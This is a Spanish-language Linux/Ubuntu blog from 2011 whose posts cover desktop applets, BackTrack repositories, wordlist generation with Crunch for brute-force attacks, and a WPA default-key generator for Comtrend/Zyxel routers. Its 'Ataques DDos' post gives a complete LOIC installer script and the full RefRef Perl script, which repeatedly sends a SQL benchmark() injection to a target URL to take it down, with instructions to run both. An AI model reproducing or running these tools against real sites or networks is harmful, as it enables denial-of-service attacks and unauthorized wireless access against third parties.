viernes, 9 de diciembre de 2011

¡¡Vamos a ayudarnos!!

He estado pensando, que mientras que preparo unos tutoriales, si teneis problemas a la hora de instalar o actualizar algun programa, podriais decirmelo como comentario en esta entrada y yo os hago o tutorial si es muy complejo u os doy la solucion respondiendo.

No soy una lumbrera ni mucho menos, pero os puedo intentar echar una mano, incluso si teneis problemas con algo.

Y os recuerdo que me encuentro en Facebook y en Twitter tambien para resolver dudas.

Un saludo


miércoles, 7 de diciembre de 2011

Restaurar Gnome

A mi en mas de una ocasión haciendo pruebas y tal, sin querer he quitado por ejemplo el icono de control del volumen, o he instalado algo y me ha borrado el icono que gestiona el wifi.... ( he tenido muchas de esas ) pues si os pasa la solución es bastante facil.

Solo teneis que escribir estas tres lineas en vuestra terminal y lo tendremos como cuando lo instalamos ( a pesar de que tengamos configurado algo ) :


gconftool-2 --shutdown
rm -rf ~/.gconf/apps/panel
pkill gnome-panel


esto lo ponemos sin ser super-usuario y tendremos el escritorio restaurado.

inSSiDer para linux (alpha)

inSSiDer es un programa que nos muestra las redes wifi a nuestro alcance indicandonos potencia, canal, fabricante del router ( si lo tienen reconocido ) y un grafico que muestra que señal es la que nos llega "mas limpia" por asi decirlo.

(la captura no es mia ya que ultimamente tengo poco tiempo ;) 


tambien nos da soporte Gps para tener localizados los AP que queramos o su geolocalización.

La instalacion es sencilla, solo descargamos el archivo inssider_0.1.1.0429_i386.deb y lo instalamos como cualquier aplicacion. El programa nos aparecera en Aplicaciones > Accesorios

sábado, 3 de diciembre de 2011

Calcular tamaño wordlist con Crunch

Encontre este script navegando por internet, y he decidido compartirlo con vosotros.

Este script funciona de la siguiente manera (x^y) * (y+1) = tamaño en bites donde:

x = es el numero de caracteres que vamos a usar
y = es el numero de lineas que tendra nuestra wordlist

tambien podemos calcularlo sin el script usando este comando en nuestra terminal:

echo "(16^8)*(8+1)" | bc


y sin mas demora os pego el script que espero que os sea de utilidad.



Crunch_Size

Crear Diccionarios con Crunch 3.0

En una entrada anterior ya comente el uso de este programa, pero ahora he decidido extenderme un poco mas para daros a conocer el uso de este programa el cual me ha hecho tener mucho éxito en ataques con fuerza bruta.

En el momento de esta entrada, la ultima versión es la 3.1 la cual se puede descargar desde aqui:

Para instalarlo descomprimimos y hacemos sudo make y si lo queremos instalar hacemos sudo make install pero el directorio de instalación sera /pentest/crunch/ por lo cual yo recomiendo que lo dejemos alojado en una carpeta para tenerlo mas a mano ( los usuarios de Backtrack solo tienen que poner sudo apt-get install crunch para tenerlo instalado ).


Lo primero que haremos sera irnos a la carpeta donde tenemos cruch en una terminal; 


El uso seria tal que asi, definiendo las opciones que requeramos:

./crunch [Longitud minina] [Longitud maxima] [Opciones de cararteres] [Opciones]


para guardar los resultados obtenidos añadiremos -o archivo.txt


Para un uso sin definir los caracteres solo seria poner:

./crunch 4 4


Tambien podemos elegir que caracteres queremos incluir en nuestro diccionario creando todas las combinaciones posibles:

./crunch 3 6 0123456789ABCDEF






Como crear una wordlist puede hacer que ocupemos todo nuestro disco duro, tiene una opción con la cual podemos crear varios archivos del tamaño que le especifiquemos:

./crunch 6 6 0123456 -b 1mb -o START



( he hecho el ejemplo asi porque estoy creando esta entrada desde mi Acer One )

no se pueden crear archivos mas grandes de 100 Megas asi que seria mas o menos asi:


./crunch 8 8 abcDFE123 -b 100mb -o START




Tambien podemos crear un diccionario con un numero de lineas maximo, como puede ser asi;

./crunch 6 6 0123456789 -c 200000 -o START


estas son alguna de las opciones, el resto lo podeis mirar en mi anterior entrada.

Un saludo

domingo, 27 de noviembre de 2011

Ataques DDos

Bien, un ataque DDos es una negación de servicio que se efectua lanzando paquetes TCP, UDP o peticiones HTTP para hacer caer el servidor de destino. Los programas que voy a mencionar son los usados por el grupo Anonymous para dichos ataques. Uso esta referencia por ser una de las cosas mas comentadas en los blogs.

  LOIC



este programa es el que empezo a usar el grupo el cual se puede descargar desde AQUI

Encontre por internet un script el cual hace que no haga falta emularlo con wine, os pego el codigo aqui abajo, solo lo tenemos que guardar como .sh (bash):


#!/bin/bash
# Copyfuck © 2010 q
#
# This script installs, updates and runs LOIC on Linux.
#
# Supported distributions:
# * Ubuntu / Debian
# * Fedora
#
# Usage: bash install_loic.bash


###COLOURS###


txt_bld=$(tput bold)
bld_red=${txt_bld}$(tput setaf 1)
col_rst=$(tput sgr0)


###GLOBALS###


GIT_REPO=https://github.com/NewEraCracker/LOIC.git
GIT_BRANCH=master


###FUNCTIONS###


ensure_git() #Checks if git is installed, Tries to install it if not
{
type -P git &>/dev/null ||
{
echo -e "${bld_red}Git not found! Attempting to install...${col_rst}"
if [ -f /etc/lsb-release ] ; then
sudo apt-get install git
elif [ -f /etc/fedora-release ] ; then
sudo yum install git
elif [ -f /etc/debian_version ] ; then
sudo apt-get install git
fi
}
}


is_loic_git()
{
[[ -d .git ]] && grep -q LOIC .git/config
}


is_loic() {
is_loic_git ||
{
[[ -d LOIC ]] && cd LOIC && is_loic_git
}
}


get_loic() {
ensure_git
if ! is_loic ; then
git init
git clone $GIT_REPO -b $GIT_BRANCH
fi
}


compile_loic() {
get_loic
if ! is_loic ; then
echo -e "${bld_red}Error: You are not in a LOIC repository.${col_rst}"
exit 1
else
if [ -f /etc/lsb-release ] ; then
echo -e "${bld_red}monodevelop and liblog4net-cil-dev not found! Attempting to install...${col_rst}"
sudo apt-get install monodevelop liblog4net-cil-dev
elif [ -f /etc/fedora-release ] ; then
echo -e "${bld_red}mono-basic, mono-devel, monodevelop and mono-tools not found! Attempting to install...${col_rst}"
sudo yum install mono-basic mono-devel monodevelop mono-tools
elif [ -f /etc/debian_version ] ; then
echo -e "${bld_red}monodevelop and liblog4net-cil-dev not found! Attempting to install...${col_rst}"
sudo apt-get install monodevelop liblog4net-cil-dev
fi
fi
mdtool build
}


run_loic() {
is_loic
if [[ ! -e bin/Debug/LOIC.exe ]] ; then
compile_loic
fi
type -P mono &>/dev/null ||
{
echo -e "${bld_red}mono-runtime not found! Attempting to install...${col_rst}"
if [ -f /etc/lsb-release ] ; then
sudo apt-get install mono-runtime
elif [ -f /etc/fedora-release ] ; then
sudo yum install mono-runtime
elif [ -f /etc/debian_version ] ; then
sudo apt-get install mono-runtime
fi
}
mono bin/Debug/LOIC.exe
}


update_loic() {
ensure_git
if is_loic ; then
git pull --rebase
compile_loic
else
echo -e "${bld_red}Error: You are not in a LOIC repository.${col_rst}"
fi
}




case $1 in
install)
compile_loic
;;
update)
update_loic
;;
run)
run_loic
;;
*)
echo "Usage: $0 "
;;
esac


una vez creado el archivo solo tendremos que cambiarle los permisos con este comando:

chmod 777 nombredelscript.sh


lo instalamos de poniendo este comando:

./nombredelscript.sh install

despues nos creara un archivo llamado LOIC, y para ejecutarlo escribimos:

./nombredelscript.sh run




REFREF


Esta herramienta ha sido desarollada por Anonymous y se presta a ser mejor que LOIC siendo catalogada como la herramienta definitiva para ellos.


Necesitamos tener Perl instalado para poder correr el script.

Os pongo el codigo por si alguien lo quiere revisar o echarle un vistazo por curiosidad:




#!usr/bin/perl
#RefRef (C) Anonymous 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();

sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}

sub adios {
print "\n[+] Stoping attack\n";
copyright();
}

sub head {
print "\n\n-- == #RefRef http://hackingalert.blogspot.com == --\n\n";
}

sub copyright {
print "\n\n-- == RefRef http://hackingalert.blogspot.com == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 \n";
}

sub toma {
return $nave->get($_[0]);
}

# ¿ The End ?


os dejo un video demostrativo de esta utilidad:




¡¡Tambien en Facebook!!

UbuntuSaurio

Promociona también tu página

¡¡Estoy tambien en Twitter!!

jueves, 24 de noviembre de 2011

MultiSystem - Crea Usb con varias distribuciones


Con este programa podemos crear un pendrive con varias distribuciones linux ( incluso con windows pero todabia no es estable)

El programa lo instalaremos añadiendo un repositorio:


sudo apt-add-repository 'deb http://liveusb.info/multisystem/depot all main


y añadimos la clave plublica:


wget -q http://liveusb.info/multisystem/depot/multisystem.asc -O- | sudo apt-key add 


y actualizamos e instalamos:


sudo apt-get update && apt-get install multisystem


os dejo unas imagenes sobre el programa:



Applets para Gnome

Para mi personalmente es muy comodo tener todo centralizado en la barra de gnome. Asi que os voy a explicar como podeis instalar estos applets para el escritorio.


Ubuntu One Indicator


Es una aplicacion con la cual podemos tener controlada nuestra nube de ubuntu one y saber cuando almacenamiento estamos consumiendo por ejemplo o como va la subida de archivos.


para añadirlo solo tenemos que escribir estas dos lineas en una terminal:

sudo add-apt-repository ppa:rye/ubuntuone-extras
sudo apt-get update && sudo apt-get install ubuntuone-indicator

con lo cual añadiriamos el repositorio, actualizariamos el sistema y lo instalariamos

Indicator-SysMonitor


con este podremos ver la carga del sistema en la cpu y en la memoria ram.


para tenerlo solo tenemos que descargar el paquete del desde AQUI

Touchpad-indicator


con este podremos seleccionar si queremos deshabilitar el touchpad directamente desde el escritorio.


para tenerlo instalado solo tendremos que ejecutar estas dos lineas en una terminal:

sudo add-apt-repository ppa:atareao/atareao
sudo apt-get update && sudo apt-get install touchpad-indicator

MyWeatherIndicator


Con este podemos tener el tiempo y la temperatura en nuestro escritorio con tan solo un click.




para tenerlo solo tenemos que añadir el repositorio, actualizar e instalar:

sudo add-apt-repository ppa:atareao/atareao
sudo apt-get update && sudo apt-get install my-weather-indicator

CPUFreq


Esta aplicación esta pensada para usuarios de portatiles por ejemplo, para seleccionar a que frecuencia debe de trabajar la CPU ( la escala de frecuencias depende de las que soporte nuestro procesador ).




para instalar como en el caso anterior:

sudo add-apt-repository ppa:artfwo/ppa
sudo apt-get update && sudo apt-get install indicator-cpufreq

Indicator Keylock


Con este tendremos un aviso en el escritorio cuando pulsemos el bloque de mayusculas.


para esto solo tenemos que añadir estas dos lineas en una terminal:

sudo add-apt-repository ppa:tsbarnes/indicator-keylock
sudo apt-get update && sudo apt-get install indicator-keylock

pero si queremos que se integre perfectamente en nuestro escritorio podemos descargarnos tambien unos iconos para los temas de los dispongamos:

sudo apt-get install indicator-keylock-ubuntu-mono
sudo apt-get install  indicator-keylock-humanity
sudo apt-get install indicator-keylock-elementary

Pastie


Con este applets tendremos controlado lo que tenemos en nuestro portapapeles de una manera amigable, no es compatible con ubuntu 11.04 u 11.10


tecleamos esto en una terminal:

sudo add-apt-repository ppa:hel-sheep/pastie
sudo apt-get update && sudo apt-get install pastie

LookIt!


Con este podemos hacer capturas de pantalla del escritorio entero o solo de un area determinada.


como en los casos anteriores:

sudo add-apt-repository ppa:lookit/ppa
sudo apt-get update && sudo apt-get install lookit

Feed Indicator


Este la verdad es que muy util ( almenos para mi ) para poder tener todos nuestros canales Rss en el escritorio y notificarnos al momento de sus actualizaciones.


este lo podeis descargar desde aqui http://code.google.com/p/feedindicator/


La informacion aqui espuesta ha sido extraida de OMG ubuntu

lunes, 16 de mayo de 2011

Repositorio Back-Track 5 en Ubuntu x32 - x64

Pues como algunos sabreis, ya ha sido lanzado BackTrack 5 el cual esta basado en Ubuntu 10.04 Lucid Lynx con el kernel Linux 2.6.38 y ahora con la opcion de poder escoger el escritorio Gnome ya que siempre venia con KDE.

Soy fiel seguidor de esta distribucion asi que os voy a decir como añadir los repositorios en nuestro ubuntu.

Lo primero sera añadir los repositorios a nuesta lista de fuentes con sudo gedit /etc/apt/sources.list  y añadiremos las siguientes lineas:

Para arquitectura de x32:

deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

para arquitectura de x64:

deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

y procedemos a añadir la clave PGP:

wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

y ahora escribimos sudo apt-get update para tener el repositorio actualizado.

miércoles, 6 de abril de 2011

Generador de fechas para diccionario

Naufragando un poco por internet encontre este generador cuya peculiaridad es que genera fechas para incluirlas en un diccionario. En realidad la utilidad de esto es mas bien simple, pero cuando nos enfrentamos a una wpa cualquier diccionario que podamos tener a mano o generar siempre nos vendra bien.

lo podemos descargar desde AQUI  y un ejemplo de uso seria:


./datelist -b 1999-01-01 -e 1999-12-31 -f ddmmyyyy -o datelist.txt -s -


os dejo un video para que podais ver como funciona


viernes, 18 de marzo de 2011

WPA redes WLAN_XXXX y JAZZTEL_XXXX

Ha habido mucha controversia con el descubrimiento del patro de las claves de estos router de telefonica y jazztel que al ser liberado generador habiendo descubierto el algoritmo, han dejado indefensos miles de routers, concretamente de la marca Comtrend y Zyxel.

Ruego lo useis con cabeza para comprobar la segurida de vuestra red y no para meter las narices en las redes ajenas, que internet no esta tan caro.

Bien, despues de haber dicho esto, vamos al lio:

descargamos el programa desde aqui http://www.seguridadwireless.net/archivos/WPAmagickey-0.2.0.tar.gz , tambien esta disponible para windows por si a alguien le interesa.

Descomprimimos el archivo y lo instalamos con:

sudo make clean
sudo make
sudo make install

y depues para ejecutarlo ponemos en una terminal:

wpamagickey ESSID BSSID [fichero]

para los que quieran saber mas de este patron de clave, podeis visitar esta entrada del foro de seguridad wireless

sábado, 5 de febrero de 2011

Perdon por la falta de atencion en estos meses, pero el trabajo me tiene mas liado que la sandalia de un romano. Maána constestare a vuestras cuestiones. Mil perdones.

Un abrazo

sábado, 1 de enero de 2011

Prey

Feliz año nuevo a tod@s lo primero:


En esta ocasion vengo a hablaros de este programa que nos servira por si alguna estraviamos nuestro portatil o nos los roban. Esta aplicacion tiene la peculiaridad de enviarnos fotos de la web cam cuando nos es sustraido, marcarnos en un mapa de google maps desde donde se hizo la conexion a un wifi abierto dentro del alcanze del portatil ademas de mandarnos capturas de pantalla del ordenador para poder identificar a la persona que tiene nuestro portatil.

Podemos descargar el paquete .deb desde la pagina del proyecto pero tambien esta disponible para otras plataformas como windows si tambien lo tenemos instalado en el portatil. Una vez instalado nos vamos a nuestro menu de ubuntu y en Herramientas del sistema aparecera Prey configurator y alli tendremos las opciones de configuracion y un asistente para registrarnos en la pagina del proyecto para poder recibir alli los datos y poder dar de alta como perdido nuestro portatil para que el programa entre en funcionamiento y como cuenta gratuita tenemos 100 subidas de informes entre las que estan las capturas de pantalla, geolocalizacion y las capturas de la web cam.

Os dejo unas capturas:


Una vez registrado en la web del proyecto podremos acceder al panel de configuracion y elejir las acciones a ejecutar cuando demos de alta el portatil como perdido.